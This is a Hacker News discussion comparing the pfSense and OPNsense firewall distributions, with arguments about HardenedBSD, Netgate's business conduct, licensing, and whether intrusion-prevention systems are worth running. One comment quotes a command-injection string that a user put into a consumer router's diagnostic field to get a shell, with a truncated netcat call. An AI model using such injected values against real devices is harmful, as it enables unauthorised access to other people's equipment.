Hacker News new | past | comments | ask | show | jobs | submit login
PfSense vs OPNsense: technical comparison (firewallhardware.it)
45 points by auslander on June 30, 2018 | hide | past | favorite | 106 comments

As someone with extensive experience and nuance in the FreeBSD community, I will just say that OPNsense and closely affiliated HardenedBSD are basically unintentionally hilarious clown projects. They created some bad blood with particular people but the HBSD side tends to just give me a good belly laugh every handful of months, usually around the larger conference season. Folks from OPN and HBSD appear to have rudimentary grasp of C while making grandiose security claims. This is probably my favorite feature comparison of all time https://hardenedbsd.org/content/easy-feature-comparison. It appears to be largely cult of personality ensnaring users that don't really know any better.

YMMV but for people wanting a firewall you'd be much better off with pfSense, stock OpenBSD, or stock FreeBSD. To get involved in OS work or BSDs you're much better off with Free/Open/Net/TrueOS. Those are communities filled with competent people to support the code and that you can learn from.

Folks from OPN and HBSD appear to have rudimentary grasp of C while making grandiose security claims. This is probably my favorite feature comparison of all time https://hardenedbsd.org/content/easy-feature-comparison. It appears to be largely cult of personality ensnaring users that don't really know any better

Could you explain whats bad about that comparison? Or point to an example of their "rudimentary grasp of C" ?

The comparison is cherry picked cargo cult. ASLR and a lot of these mitigations were obsolete when HBSD implemented them https://www.endgame.com/blog/technical-blog/rop-dying-and-yo.... Their ASLR try was rejected by FreeBSD.org. Some of the bullets are completely asinine like xxx hardening, what does that even mean? The lead developer recently gave a conference talk where as far as I can tell he showed that you can root a box as.. root https://www.youtube.com/watch?v=bT_k06Xg-BE.

Can anyone point to a paper showing where HBSD successfully prevented an attack over FreeBSD?

So they generate a lot of noise. Instead of learning from the larger communities that are filled with extremely talented security people like Colin "cperciva" Percival, Robert Watson, Theo de Raadt, Maxime Villard, etc Shawn seems hellbent on being an exemplar of Dunning-Kruger effect. Unfortunately he is towing others along for the ride.

ASLR is obsolete? Why?

Sorry, you didn't bother reading the link so you may consult Google if you are interested.

You started a nasty flamewar with this and got more uncivil downthread. We ban accounts that behave like that, so please don't. Instead, please present your arguments civilly, regardless of how right you are.


Sorry, wasn't the intent. It did appear we were going to make progress in the discussion at points but now is clearly two people with cemented viewpoints.

The link is not about ASLR, but ROP. ROP != ASLR :)

Anyway, even there, we can read : "ASLR aims to prevent an attacker from using previous knowledge of the address space to gain an advantage and execute malicious code. This has proven extremely effective in “raising the bar” of exploitation and is one of the most significant research challenges"

So, back to square one, why ASLR is obsolete? Its one of the main security features.

Recap: OPNsense uses HardenedBSD as base OS, which have ASLR, along with other BSDs. pfSense uses FreeBSD, which don't have ASLR/ASR.

The first sentence in the article should be a bell-ringer "Too often the defense community makes the mistake of focusing on the what, without truly understanding the why."

These are context sensitive things that aren't learned by reading a comment thread, if you can't read that article and understand that it shows a multitude of exploits that bypass ASLR and that almost every exploit and contest includes or relies on existing ASLR bypass I don't really know what to tell you other than to keep reading and researching. The answers you seek are linked from TFA.

>The answers you seek

I expect you backing up your statement that ASLR is obsolete. So far all we have is a URL and advice to research ourselves.

What stops you from giving a direct answer? Hint: "ASLR is useless, because I can, for example, do this: ..."


So he can read all memory before exploiting, aha. I give up. You mentioned a language problem? Sure, I can rephrase all I said in simpler terms :)

Please don't react to flamebait by joining a flamewar. We're trying to avoid that here.


No, that's not at all what TFA says lol. You'll fit right in with HBSD and OPN crew :)

Agreed - I will not change from pfSense to OPNsense. Just because you sprinkle Bootstrap on top of pfSense and even remove some functionality does not make it better. My primary concern with OPNsense is however the community behind it, and their tendency to engage in deceptive behavior.

Oh, and note the passive aggressiveness here: https://docs.opnsense.org/fork/thefork.html#so-why-did-we-fo...

Your link got me digging - apparently pfSense has some security issues:

The web server runs as root, and so do all the pages (PHP, etc).


It somehow reminds me OpenBSD. People complained about their developers being rude, but hey, they cleaned a lot of junk and are more secure now that FreeBSD.

OpenBSD is not a FreeBSD fork.

I know that it is not. Their common ancestor was BSD 4.3 Reno.

And for pfSense and OPNsense common ancestor was m0n0wall.

> And for pfSense and OPNsense common ancestor was m0n0wall.

pfSense forked m0n0wall

Opnsense forked pfSense.

At some point, everyone forked everyone, but all the code was written by communities under open licenses, so the distinction is entirely political.

Ohhh, really ? :)))

Yes, really.

Two forks fighting :)

Perhaps, but the pfSense community has gotten toxic over the past few years, mostly due to the commercial side and the very aggressive stance towards any perceived loss of income.

Projects like pfSense, OpnSense and other GUI-on-top-of-OS systems are only sensible for more end-user applications and community driven approaches. I switched from pfSense to OpnSense not because of any real diffrence between the two, but because of the backing community, which is more for the users than it is for me personally; most people using this stuff are in the home of SMB markets and are much more serviced by a Web UI and a community than some commercial entity.

Once you go commercial or deep technical, none of the projects make sense as you are almost always better of going current with a configuration management based system (like plain pf on a BSD in combination with something like SaltStack, Ansible, or Chef) or go classic with one of the larger vendors like Cisco and Juniper.

pfSense is shooting itself in the foot by being (petty) d.cks, OpnSense is shooting itself in the foot by (and this is hearsay afaik) technical deficiencies in the primary backing team. On top of that, prosumer vendors are now getting the hang of it and are releasing affordable, supported, yet not too-expensive hardware for most of the setups you'd see those BSD-based WebUIs in. (i.e. UBNT)

I'm predicting that pfSense will try very hard to go full-on commercial, perhaps using the open core model like GitLab does, but probably failing at the commercial side because the advantages (that that goes for OpnSense too) vs. a prosumer/entry-level device from an existing brand are getting smaller and smaller. Most of the advertised stuff (again, goes for both) that you'd get for using open source software isn't really that much of an advantage anyway, most users never report bugs, write patches, inspect the OS, or check checksums. For OpnSense, they are probably going to try to not make a split product, but instead try the vendor network model where you make money by selling support and perhaps pre-configured hardware for people that are stuck between prosumer and home gear needs.

What I personally would like (and I'm still using a mix of pfSense and OpnSense for all GUI-needing systems) is an API-first system, with either no GUI at all, or an optional GUI. Maybe in the direction of VyOS (https://vyos.io/), which is linux based, and currently API-only. This would perhaps have to compete with OpenWRT, but at that point we're getting pretty far away from the capabilities of BSD.

A lot of the setups where there was no budget, or the firewall/router had to be virtual are currently only running pfSense/OPNSense because of a lack of better alternatives, the paid systems are not 'better' by any means, and their past USP was always with the hardware (which at some point became obsolete as well as packet processing in software became fast enough).

For now, I'd suggest anyone who needs a software router/firewall/gateway with a GUI and reasonable OS to first check OPNSense, as for most uses a healthy community is important. For everyone else, it's probably not really an issue in the case of cloud networking as they all have API-driven (and a GUI to drive the API) firewalling which covers almost all SMB use cases. So far I've only seen three cases where the box-with-a-firewal-and-GUI approach still matters: home, smb, on-prem with no investment in skill. As soon as you have the skill and infrastructure to go without a GUI, none of the sense/ wrt and prosumer systems matter, and as soon as you go beyond the 'need to buy stuff because we don't know or want to do it' stage you get in MSP/Cloud territory.

Editing (mostly for my own update regarding what's out there) for some extra projects:

There seems to be a number of 'other' projects in various states of integration, support and maintenance;

1. https://bsdrp.net which looks like a much more 'embedded' CLI router, has configuration abstraction 2. https://securityrouter.org which uses open everything except the nice backend which does paid upgrades for features 3. Floodlight Controller has a REST API for configuration, which does mostly firewalling and switching, not really a gateway or something like that, lives mostly in the SDN realm, mostly found on Linux systems instead of BSD, but it's a model that comes closer and closer to the model you get on providers like AWS. CloudFirewall is an (older) example of letting one device do the packet and frame forwarding, but some other service do the rules and control of one or more of those devices (be it hardware or software devices).

> What I personally would like (and I'm still using a mix of pfSense and OpnSense for all GUI-needing systems) is an API-first system, with either no GUI at all, or an optional GUI.

Yup. Have you looked at TNSR?

It’s what we’re doing (in addition to pfSense).


Docs: https://www.netgate.com/docs/tnsr/

API (be sure to hit Nav -> Modules)


As for your prediction that we will take pfSense “full on commercial”,...

Well, frankly, you’re wrong.

Well, frankly, your software has:

1. a big banner with angry text about commercial and trademark stuff

2. a widget about Netgate selling you stuff

3. A Netgate Device ID so you can track pfSense and no way to remove that

Basically, pfSense is Netgate's b!tch, and almost none of the FOSS community spirit is left.

You don't see this with other projects, it's clearly a direction chosen by Netgate and the paid people. It's about money, and about being commercial. The community forum is a commercial outlet, and anything that might even come close to not giving netgate sales is censored.

About TNSR, it does look like a neat set of features for the much more integrated cloud world, and SDN setups, but there is no easy to find information about the state of licensing, cost, sources etc. It's very easy to buy this stuff already, the only interesting things for most members of our implementors forum is having a FOSS solution with paid support and perhaps enterprise extras to buy like Elastico's X-Pack. Even if TNSR were to come out on top in terms of features and compatibility with existing infrastructures, it wouldn't have any space to operate in, at least not in the current markets we are servicing (which is pretty much eurasia except china and russia, plus brazil and canada).

I understand all of your points. I also understand the business of a company like Netgate. Their primary condition is that you don't take their work, modify it, and still call it pfSense. That's not any different than RedHat or Canonical (who might not need a banner because they have a fleet of legal staff that quietly handles "compliance"). On the human side this is a product that they put a lot of work into and is also the livelihood of the main contributors, so yes they do deserve to be compensated with their products and services offerings, and trademark is a reasonable tool to enforce so people know they are dealing with the real product they support and said main contributors. Projects owned by a company also have almost no governance infighting nor analysis paralysis issues; there are trade offs to everything.

They are giving you the software for free under permissive licenses. If you want to take it, remove the ID, and make money using their exact business model, you can do that if you call it something else. That is exactly what OPNSense is. Being permissively licensed it's generous to the point that you can take the code, turn it into a proprietary product, and make a fortune without ever communicating or doing anything for the parent. By respecting the trademark they aren't asking for much at all.

Well, it's not really about any of that. It's the same stuff they have been saying, but what it is actually about is trying to say 'we are a neat community FOSS project' on one side, by actually being a generic commercial vendor that happens to have an open OS due to legacy reasons. In the 1.2.3 and early 2.0 days, it was all fine, before that it was mostly 'just monowall' and after that it was 'lets try to work full time on this stuff and make money'.

There is no reason to be assholes as other projects work fine using the same free open core + paid enterprise version, this is something Netgate-specific, probably due to the hardware business where you have physical things that lose value unless you unload them quickly.

Now, don't get me wrong here, I'm not saying commercial business of trying to sell hardware/software is inherently bad, but being pissy because someone else does it too is just weak.

Netgate didn’t build pfsense from scratch, it’s a fork of monowall which is in turn basically just a GUI on top of the networking stack that ships with FreeBSD.

Netgate deserve some credit for their effort, but not so much that we should turn a blind eye when they get bitchy and malicious about the use of open source code.

I’ve said for a long time now that the whole AES hardware requirement would prove to be little more than a red herring to dampen open hardware sales; it’s pretty hard to argue otherwise now.


Vote quietly and without insinuating shillage, please.


A nice rule in the abstract.

Thanks a lot for that, I was curious why I haven't heard of OPNsense before.

Have you heard of the other stuff? Most people probably know OpenWRT or DD-WRT by name (from the home wifi-router combo devices). Or did you roll into the 'real' stuff so early on that you never actually had to look for pre-existing implementations to base a project on.

What other stuff? I heard about pfSense, OpenBSD's PF, iptables. I'm actually sysadmin, just choosing beefy integrated router/firewall/whatever_fancy for my home x86/2core w. AES-NI/4GB RAM, box to replace Sophos UTM, I suspect it is phoning home too much :)

Ah, then I misunderstood you ;-) I've seen users replace Sophos UTM with other solutions quite often now, it seems to have too much 'invisible' parts and suspicious system connections to the world (as far as I've heard -- not used it myself). I'd say try OpnSense (and perhaps pfSense). They are the 'best' replacements for Sophos UTM free as far as I know.

> be much better off with pfSense, stock OpenBSD, or stock FreeBSD

There is a reason why people install pfSense and not stock BSD, its called GUI :)

And pfSense was playing with licences before, some think it's getting ready to do it again.

> And pfSense was playing with licences before, some think it's getting ready to do it again.

FUD much? 'some' might think, but I know, and we're not.

Reddit folks are worried, for example: https://www.reddit.com/r/PFSENSE/comments/7398pa/absolutely_...

Btw, OPNsense is using BSD 2-Clause "Simplified" license. The "permissive", non-copyleft one, same as FreeBSD uses, not psSense's Apache 2.0.

"It is a fork of pfSense, which in turn was forked from m0n0wall, which was built on FreeBSD. It was launched in January 2015. When m0n0wall closed down in February 2015 its creator, Manuel Kaspar, referred its developer community to OPNsense" [0]

I just heard of OPNsense today. Also, there [0] is a thing about pfSense hoarding OPNsense's domain ...

[0] https://en.wikipedia.org/wiki/OPNsense

I have been doing security work for a very long time, since before the projects underpinning pfSense were a thing (I don't mean Snort, which I predate, but pf itself; I was working in network security when we were all being thrilled by Darren Reed's work on ipfilter).

I say this not to brag (it would be a terrible brag, like playing up my Turbo C++ bona fides) but as context for a question:

What are people doing with these things?

When is it making sense for people to be deploying what appears for all the world to be the Kali Linux of Defensive Network Security? I'd be confused to hear about a client deploying Suricata at all --- but Suricata on a dedicated firewall box with a PHP interface? What problem is this solving?

Among the top 10 questions startups ask us when we talk to them about what we do is, "we got this self-assessment questionnaire from a big client and it asks what our IPS is, what IPS should we use?" And we laugh and say "these SAQs were written in the 1990s and lovingly handed down from generation to generation of network security engineers and nobody actually expects you to install an IPS because doing that in a 2018 production environment would be silly, just tell them you only expose ports 80 and 443". And that answer always works. How are people finding a different answer? I'm genuinely asking.

I use pfSense. I do not use the IPS features mostly because of the reasons you present. However pfSense is also a very capable router, which is why I use it.

Are there other ways to solve this problem? Of course, most problems in tech have a large number of solutions, each with their own trade offs. If I were to set my network up again, I would probably go with an edgerouter pro or similar - but since I already had a low power server I could repurpose as the router, it was $0 vs $400.

That makes sense. If that's why most people use these things --- to repurpose old hardware in their basement rather than ordering a new router --- then pfSense makes some sense to me.

Doesn't have to be just re-purposing old hardware for it to make sense IMHO.

I started using pfSense on old hardware to get rid of Verizon's router, however I plan to replace it with a brand new box that will likely be $250-500.

I have gigabit FiOS coming into the ONT outside, and from there I get an Ethernet port that comes straight to the pfSense box. No Verizon router present at all.

Besides pfSense, what other open source options do I have to run a firewall that can handle gigabit ethernet with VPN? DD-WRT? Tomato?

Sure, I can setup a Debian box with iptables in my sleep, but pfSense is much nicer.

I’m in a similar boat (ATT fiber) and really curious as well. I’ve considers pfsense with dual gigabit nic but honestly I’d rather have a dedicated box that can handle the routing and firewall features.

OpenWRT is standard for routers, you can even run it on x86 just fine, and unlike PFSense it won't shit a brick and sit in a broken state at console just because a secondary ethernet interface disappears.

PFSense really is targeted at the prosumer market. If your happy to haul a screen out on every upgrade or minor hardware change, PFSense is fine. Otherwise, going Openwrt is a solid choice as you can actually debug it remotely.

Nice, first post and all I get is downvotes. Screw this place!

I once tried out pfSense, about 8 years ago. I was looking for a VPN solution for a small startup. I had used pf on OpenBSD, and really liked it as a firewall, so having "pf" in the name made pfSense sound good to me. My hope was that pfSense would provide an easy out of the box VPN setup, without me having to configure a RADUIS server to talk to LDAP, and have easy user provisioning.

What I found was a mess of PHP and poor quality plugins. The init scripts were written in PHP, and the plugins modified the init scripts. So plugins could, and did, break the init process, preventing the firewall rules from loading.

I don't think people are using pfSense in production environments, I see this class of solution being used by IT at small companies. Think about big corporate networks, where you might have a device from Palo Alto Networks, or a Cisco ASA for a remote access VPN. Then imagine you are at a 20 person company, a decade ago before SaaS really took off, and you think you need a VPN, but can't afford something from a big company, and don't want to glue together a bunch of open source tools. I think that is when people reach for pfSense.

I don't think it makes much sense these days. Small companies can use much dumber (and better) gateway devices. With SaaS and things like Google IAP and Cloudflare Access there is little need for VPNs. As for IPS, I have trouble imagining IPS being needed or even working at a small company. Big companies can have sophisticated detection systems and teams to deal with them. Hopefully big companies were never using pfSense.

>What I found was a mess of PHP and poor quality plugins. The init scripts were written in PHP, and the plugins modified the init scripts. So plugins could, and did, break the init process, preventing the firewall rules from loading.

Really, really, not my experience and I've been using it for 7~ years.

>I don't think people are using pfSense in production environments

I was running 1% of all internet traffic through dual pair of pfSense firewalls running on some HP 2U servers during Christmas 2011.. (interface was slow as shit with that load though to be honest).

I wouldn't discount it's power. Mostly when you buy something like a Juniper SRX it's similar underneath. It's not like there are common ASICs for firewalls.

You need to use pfSense now.

Its come a long way since you did.

People are using pfSense in production too.

(though I have my quibbles with NetGate, who owns pfSense).

> Suricata on a dedicated firewall box with a PHP interface? What problem is this solving?

The same as every other feature bullet - checking off a box so the product doesn't get "out-checked". Only this time it involves tinkerers, who might set the thing up because it sounds cool, before really asking why. Presumably the package was already in some repo, and it tickled someone's fancy to do the little bit of integration work. But that doesn't mean these types of packages are driving the adoption of pfSense. That said, I don't really need MRTG graphs but if I can get them by clicking a few boxes, I just might.

As other people have said, the main driver is (NAT) routers. Soon in need of a faster router, I'm personally considering trying out the pfSense route rather than straightforward (for me) Debian+iptables. Both for a bit of kernel diversity, and sometimes it's nice to just click away.

> Especially since I'd have to park it behind my ISP's prem box, which is the thing that is actually going to get owned up on my home network.

Your ISP's equipment is not part of your home network - you're better off viewing its ethernet port as the service demarc. In fact, given the straightforward business interest in say enumerating the devices on your home network, I'd characterize it as a persistent attacker. Protocol wise, there's little drawback to just lumping it with the ISP's overtly-hostile DPI gear. About the only trust I'm willing to grant that thing is that it's unable to draw untoward amounts of power say mining crypto coins, and if it's already fed by fibre that it won't create its own electrical surges.

If you read this site you are probably well above the target audience in terms of skill. By numbers, I'd guess small/mid size business IT personnel dwarf the higher end multi-tier {dev,eng,ops,sre,sec} of tech companies. And these IT folks generally need a push-button appliance experience due to education/skills. Think Microsoft products, and control panels and wizards on Linux like cPanel.

If you go walk the floor of a commercial data center, you will see tons of sonicwall, Ubiquiti, etc. Basically these are an open source version of those.

Now a subset of these projects might have some serious implementation smells, but I wouldn't really pass judgement on the users of any of those things. Just about any business can benefit from technology, not everything is well suited for services/hosted approaches, and there is clearly a need for simplified IT equipment.

Sure, I get that, but my point isn't that I would do what pfSense/OPNSense does in a better, more elegant way; it's that I wouldn't do them at all. Isn't that even easier than installing one of these thingies?

Say you have a single static IP at a small office and need to set up a network of systems behind a NAT with DHCP, and maybe a few PAT forwarding rules to a server. It would basically take the time to burn a USB stick and boot it, and 30 minutes of following the UI prompts for even low skilled folks. What would you recommend said folks do instead?

Isn't that a problem almost every wifi router that costs more than $150 already solves? I might just not be understanding your requirements. Also: you just described a problem that requires something like 2% of all the crud OPNSense brags about running.

I’ve been using pfSense for about 5 years. The past 10+ years I’ve been on either 1x1Gbps or 2x1Gbps symmetric up/down links via fiber (no isp boxes), no consumer/semipro router in the $150-400 range have been able to keep up with these links (tried a few at different times) and especially not handling IPSec-tunneling at these speeds. So I use my old Nehalem/supermicron server (8c/24GB ram, multiple intel pro nics). Used to run FreeBSD+pf then NetBSD+npf manually configured but around 2013 my hard drive broke in a move so I just threw pfSense onto an old disk I had laying around as a temporary solution to get up and running quickly, at that point I never had time/got around to actually set up npf again so I just keep running pfSense and still am.

This server costed me about $100 since I salvaged most parts from a broken server I bought of some company back in 08, been running really solid and tried to replace it with highend prosumer routers a few times when I were upgrading my Wi-Fi but they never kept up, I’m now using UniFi Ac PRO for Wi-Fi since my last tplink router/ap broke.

> every wifi router that costs more than $150

Price does not matter. Botnets are created on consumer grade routers, of any price range. Asus, Netgear and the like. None of them are x86 based, and most run outdated busybox linux on low power SoC chips.

Botnets are created on internet of things and printers, rarely on routers. A small business trying to setup and administer a Unix server as a router is more likely to go wrong than buying a dedicated appliance.

My point is I don't trust consumer grade stuff.

> Unix server as a router is more likely to go wrong

That is exactly why you install pfSense/OPNsense.

I’ve actually trivially rooted my mothers Asus two times when she had network problems and I had to find a way of debugging it remotely. One time I could inject an RCE via some kind of network connection testing tool they had which were supposed to take an uri but happily accepted something like "google.com$(whoami; nc...&)"

I don't know why people use it either.

I looked pretty seriously at using it when I was considering building a outgoing firewall product, when people could share blocklists for IoT devices and things like SmartTVs.

It's pretty well suited for building things like that on top of.

Maybe people are building things like site blockers for schools on top of it?

Maybe it's just a hobbyist/prosumer play?

> I don't know why people use it either.

I'm shocked this is a common statement on this.

Because its great. Its a fast firewall and router. Its perfect for not overpaying for something like a Cisco ASA.

But in what circumstances? How big is your business?

If you are running a SME office, then there are plenty of decent firewall appliances which are much cheaper than Cisco ASA, and have much lower support overhead than Sense.

If people are doing it for fun or as a hobby great. But given that you can get perfectly good appliances at $500/$1000/$2000 pricepoints, where is th price tradeoff where is makes sense to use Sense?

The thread is too deep to reply direct, but you appear to be more or less agreeing. There are low powered x86 systems at that price point. pfSense has offered a software upgrade path for over a decade, and takes security advisories seriously, so how many store bought routers can boast anything close to that? pfSense also scales up to 10gbit forwarding performance. I can't really comment on the cruft, AFAIK you don't need to run an IDS and that is all in packages.

One case where I would use pfsense. Let's say you are a system admin of an small private school, you get an alert email from Comcast saying that copyrighted content was downloaded using torrents. You deploy pfsense and with 30 clicks you have snort configured and set to block torrent connections.

Can you please comment why installing IPS in a production environment in 2018 is silly? (genuinly want to know)

Also, when or where would you recommend installing an IPS product? As part of a corporate firewall?

I would more or less never recommend installing an IPS. In the past dozen or so years I've spent lots of time (months at a time) working on the networks of F500s that have fleets of IPS systems, alongside their security teams, and I have never once seen an IPS do anything but generate alerts that get bucketed in a SEM and forgotten about.

I completely agree but think this shows a failing of "blue team" culture and education. I now started work in a massive project with half a dozen companies sharing massive AWS VPCs. They have limited security team oversight and coordination. Wouldn't it be nice of they had sufficient levels of access to Snort Suricata data and could learn what normal operations looks like and educate themselves to look for poorly documented systems that are not hooked up to SIEM or even the APM correctly or are failing to talk to different EC2 instances correctly and help? Inventory and ops is sexy and not security but why countless times I see younger SOC kids know absolutely nothing about what their environment looks like. That data would not help them even if they are allowed out if the kiddie sandbox and only allowed to read baked queries and alerts.

The reason this stuff is useless is bc I have never met someone with sufficient experience to act on it for any context, bc people think the tools magically bring educated talented people.

I've used pfSense several times to have a (semi-)pro grade router/firewall at an entry level price. For me it strikes a nice balance between power and ease of configuration. Even though personally I don't care too much about most advanced features, I like how there are no arbitrary limitations, and it's good to know that the underlying technology is solid and inspectable/tweakable if needed. And yes, I do buy new hardware for it without hesitation; the PC Engines APU is very well-suited. This way $200 can get you a better solution than $600–$800 off-the-shelf.

Maybe we're doing it wrong, but we use IPS for the same reasons that we use signature-based antivirus---as a backstop. Ideally, they wouldn't do anything, but we live and work in a less-than-ideal world with imperfect information security policies (and configurations), mobile users and visitors and students, and IT staff who aren't all infosec pros like you. And in that less-than-ideal world, both intrusion prevention systems and antivirus software mitigate enough risk to make their procurement, deployment, management, monitoring, and maintenance worth my while.

Here[0] is a series of videos showing what a small IT company does with pfsense.

[0]: https://www.youtube.com/user/TheTecknowledge/search?query=pf...

Huge number of answers, but I'll give mine. At work I would use a Ubiquity or untangle or Mikrotik or something, but for home use yeah, for less than the cost of one of those that will do gigabit you can get an old server (small), put PfSense on it, and have something far more flexible than an Asus or Netgear. For instance:. Try setting port 80 only coming IN from certain IP with one of those? Not even sure you can do that on a Ubiquity. Try to find something that can do that AND do UPNP so you kid can play Black Ops 3...

PFSense does provide a free GUI interface to OpenPVN. That's useful in many small business applications. Also, don't discount that you can't buy one at BestBuy, that lends (for non-technical peeps) a veneer of credibility.

> What are people doing with these things?

With Suricata, or with pfSense?

Suricata is used when you want to block internal clients that do something suspicious (like join a botnet), or to notice something unwanted (like using a banned application, such as dropbox).

> but Suricata on a dedicated firewall box with a PHP interface? What problem is this solving?

Ease of use with out overpaying for the same feature seat. I'm surprised you think there isn't a problem its solving, to be honest.

> What are people doing with these things?

home routers ?

PfSense is very popular in the SMB market where there is little to no IT staff or budget but requirements beyond what can be satisfied with a home router.

PfSense is also popular as a firewall appliance in cloud deployments. Demand for running pfSense was one of the drivers for Microsoft to add FreeBSD support to Azure.

If you need a GUI, just use something like Halon's SecurityRouter.

Is it free to use? Is it open source?

Depends / it's source available AFAIK.

Some time ago I looked at this sort of thing (simple management + status GUI for a router), and pfsense & friends are just huge, bloated pieces of mess that I really don't want on critical infra. Securityrouter OTOH came across as one of the very few frontends actually designed for security (see their docs). (Also it doesn't include a the full B/S suite)

In the end I didn't choose any GUI and just put a Debian on a box. I don't really know any of the BSDs and it certainly wasn't worth more of my time to fool around with a small piece of infra that's going to be ignored >99.99 % of the time.

> it's source available AFAIK

AFAIK it is not.

Halon pivoted away from this market. Last I looked it was a secure email play.

Wasn't SR always a side project for them? Still gets releases, though.

Why do I want my home router to be really good at detecting Windows Server attacks from 2013? Especially since I'd have to park it behind my ISP's prem box, which is the thing that is actually going to get owned up on my home network.

Not sure what is your problem, honestly. Custom home router on small form factor machine to replace buggy Netgears. Just put your ISP's box in Bridge mode.

That didn't address either of my questions/concerns.

For someone claiming to be an expert, you appear to be completely ignorant about the products you're judging.

What does "detecting a windows server attack from 2013" have to do with ANYTHING? The primary purpose of the OPNSense and PFSense projects is to be a better home router replacement. Now PFSense has "moved up" if you will into the SMB space, and has further ambitions in the routing space, but the basics still come down to that goal.

Suricata and Snort aren't even installed by default, much less required. So why do you keep harping on that functionality? It's irrelevant. These are ROUTERS that can be extended to do IPS if you so choose, but is in no way required.

Is the page we're commenting on just a really bad description of the project? Because it does not say that OPNSense is simply a ROUTER, and besides "we switched to the fastest PHP framework"† the IPS capabilities are basically the only technical comparison the article makes.

OPNSense describes itself as a firewall. A firewall is generally something you deploy along with a router. Does the term "firewall" just mean something else among the community of people repurposing old Dell towers to build complicated home networks?


Blame the industry? Every home router you can by today is a "firewalL" by their definition, because it does NAT and blocks all inbound traffic by default. I think it's silly to debate whether or not that's a fair description, but they're using the terminology their target market is used to hearing.

Some vendors have moved towards calling their SPI functionality the "firewall" portion, but that debate is about a decade too late.

I want to monitor and/or optionally block outgoing traffic. How do I do that with my airport extreme? which router should I get. One network administrator type friend recommended pfsense on a netgate device. is that bad advice?

I don't think so at all (not bad advice that is). I run PFSense and am happy with it. Things like QoS tend to be difficult to get working right, but just straight blocking isn't a big deal.

I'm not sure you need to do the netgate device unless you want support, you can use literally any x86-64 box you have lying around. Another good option if you're looking for an "all encompassing" solution would be ubiquiti. If you went that route you'd likely want to dump the airport extreme though and just go all-in on ubiquiti.

It's a page to describe what they do differently than PfSense, and that happens to be a) the web frontend and b) the choice of IDS/IPS. There is little reason to describe the "boring" standard stuff that's routing, firewalling, VPN server role that's the core of both projects. Have a look at the comparison table at the bottom for a better idea of the feature sets.

> A firewall is generally something you deploy along with a router. Does the term "firewall" just mean something else among the community of people repurposing old Dell towers to build complicated home networks?

That's an unfair characterization IMHO. In the commercial market, there are tons of "firewall appliances" that are used as router/firewall combinations: Sophos UTM, Watchguard boxes, Fortigate, ...

pfSense and OPNsense play in roughly the same space: a box you plug your WAN interface in that will do (primarily static) routing, firewalling with multiple zones, act as a VPN server. And typically have some amount of security checkboxes a la IDS, WAF, ..., although the commercial ones with the opertunity to sell subscriptions emphasize this more.

I'm no fan of php, but you realize the home routers you recommended earlier typically have CGI UIs written in _C_ by people that don't really understand strings and pointers?

Why does the linked article prominently feature suricata if it's irrelevant?

Also, the word ROUTER doesn't even appear on the linked page.

Because it is talking about what they do differently from PfSense, and thus are not covering the basic router/firewall/VPN server functionality both have had forever. The table at the bottom gives a bit better impression of what they are about.

My biggest issue with pfSense is the company that runs it: Netgate. Its putting it mildly to say they are jerks.

I was banned from their forum for saying I wouldn't pay for Gold if they were going to sunset a range of CPUs when their explanation of why was less than clear. I then apologized for offending them, and they said its a life ban so too bad.

Just read their forum or the reddit. Look for Ivor comments specifically.

I'm running OPNSense for a small private school and it seems to be working fine. I looked at pfSense but between the licensing changes, petty infighting, and "not so pretty" GUI I chose not to use it.

One of the things that OPNSense has over pfSense is the ease-of-use factor. This firewall/router will be used in a school, by non-technical people, it needs to be pretty and easy to make simple changes to. Things like blacklisting/whitelisting a site, and adding a static IP for a printer, are activities that are commonly done by a teacher or administrator. If it's hard to do then I get a call and that's no good for me. :)

I did some performance testing comparing pfsense and opnsense on idential hardware, and out-of-the-box configuration. On my Atom 1.6ghz dual Intel nic router I was able to get near line-speed gigabit NAT from pfsense, while opnsense maxed out around 825mbps. I spent only a couple of hours with the test, and quickly decided switching off pfsense wasn't worth it for me.

I am currently running pfSense, but am currently handrolling a firewall with Ansible and nftables. I highly recommend it over something like pfSense or OPNSense, I found the GUI in pfSense wasn't flexible enough.

I replaced all my bad phrasing with a pointer back to the commenter who referenced pfsense and others a clown projects. so true. bye

reading about the recent developments putting FPGA in front of a NIC it seems to me that would be a really neat way to build a firewall

Firewall and routing have been done with FPGA for many many years. Have a look at enterprise and carrier grade hardware.

I had a hard time reading this. The flow and phrasing is quite bad. Read 1/2 way and quit.

Summary, kind of. I replaced my Sophos UTM with OPNsense. So far so good.

- Sophos phones home too much, is not open source.

OPNsense in comparison to pfSense:

- using better BSD, with ASLR (the only check I did so far)

- licensed under BSD 2-Clause, vs Apache 2.0

- nicer GUI :)

- not running PHP as a root user

Looks like OPNsense is true hacker's stuff, check this out for DNS over TLS: https://forum.opnsense.org/index.php?topic=8748.msg38928#msg...

What I learned from this submission:

- people who start with their credentials, 'I'm experienced ..' - are making least sense.

- people who use the word 'FUD' are actually trying to shut down sensitive for them topic.

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact